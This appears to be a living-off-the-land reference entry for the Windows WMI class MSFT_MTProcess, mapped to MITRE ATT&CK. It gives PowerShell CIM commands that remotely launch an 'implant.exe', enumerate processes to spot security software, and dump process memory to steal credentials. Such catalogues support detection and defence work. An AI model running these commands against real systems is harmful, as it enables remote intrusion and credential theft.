.. / MSFT_MTProcess

The process data object


Functions:
Type:
Toolsets:

Resources

Execute

Launch executable

Invoke-CimMethod -Namespace Root\Microsoft\Windows\ManagementTools -ClassName MSFT_MTProcess -MethodName CreateProcess -Arguments @{CommandLine='C:\ProgramData\implant.exe /launch'} -CimSession $s
Usecase
Launch implant

Comments
Mitre Att&ck
TA0002


Processes

List running processes

Get-CimInstance -Namespace Root\Microsoft\Windows\ManagementTools -ClassName MSFT_MTProcess -CimSession $s
Usecase
Identify running security software

Comments

Create process memory dump

$p = Get-CimInstance -Namespace 'root\Microsoft\Windows\ManagementTools' -ClassName 'MSFT_MTProcess' -Filter 'ProcessId=2016' -CimSession $s
Invoke-CimMethod -InputObject $p -MethodName 'CreateDump' -CimSession $s
Usecase
Dump sensitive data from process memory

Comments
Mitre Att&ck
T1003.001




Updated: 2026-03-28
Contributor: Arris Huijgen (bitsadmin)